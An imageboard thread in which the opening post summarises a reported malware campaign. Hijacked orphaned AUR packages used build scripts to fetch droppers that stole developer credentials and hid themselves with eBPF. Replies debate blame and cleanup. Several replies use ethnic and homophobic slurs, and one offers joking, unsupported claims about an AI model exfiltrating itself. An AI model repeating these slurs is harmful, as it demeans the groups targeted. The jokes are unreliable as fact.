Someone quietly compromised the Arch Linux AUR.Not the official Arch repos, the community package ecosystem. The trust layer.Over a few days, orphaned AUR packages were taken over and “updated” like normal.But the install scripts were modified.They started pulling hidden dependencies during build time.npm and bun packages.Droppers written in Rust.Stealing developer data silently in the background.SSH keys. Git tokens. Browser sessions. API keys. Vault secrets. Messaging app sessions.Anything stored on a dev machine was fair game.In some cases, it escalated further.Using eBPF to hook into the Linux kernel and hide itself from system tools like ps and htop.Processes that exist, but don’t show up.Files that exist, but don’t appear.Network connections you can’t easily see.All routed out through encrypted channels, with Tor used for command-and-control in some reports.And the worst part?It didn’t feel like malware at install time.It felt like a normal AUR update.That’s the point.Trust got abused at the build-script level, not the application level.Hundreds of packages were flagged before cleanup began.Official Arch repos stayed untouched.But if you updated AUR packages in that window, the assumption shifts fast: credentials are compromised until proven otherwise.Rotate keys. Revoke tokens. Rebuild trust from scratch if needed.Because in systems like this, the code you didn’t read is the code that runs you.
Don't forget to update as soon as they are available goy
>>109047545Holy Reddit spacing, Batman.
We dont do this in fedora linux
>>109047612it's probably AI translated
>>109047545>orphaned AUR packages were taken overFound the problem.
>>109047624>probably
would simply running yay -Yc or equivilant be a viable fix for those affected by the malware?
>>109047545oh hey didn't mythos exfiltrate itself as a joke when a researcher asked and isn't bun owned by anthropic and they use rust internally haha
>>109047630Yeah, how they fuck did these AUR jannies let that thing going on for so long? Having literally whos claiming ownership of orphaned packages, was a ticking time bomb ready to explode on every Archnigger's face. They should get rid of that ASAP. We are living in an era where every faggot can vibecode malware. People cant be trusted anymore
>>109047658I can tell by the prose and from having seen quite a few AI posts in my time
Brother, if I had $1 for every LF you just used
>>109047545thank you llmjeet. very entergaging.
>Nothing to do with us, it's a user problem, never mind that it's got our branding all over it, no, not our problem, even though we're now cleaning it up.Arch fags want their cake and eat too.(and no, my install has zero AUR shit going on)
>>109047545>The trust layerNobody with a brain implicitly trusts users.
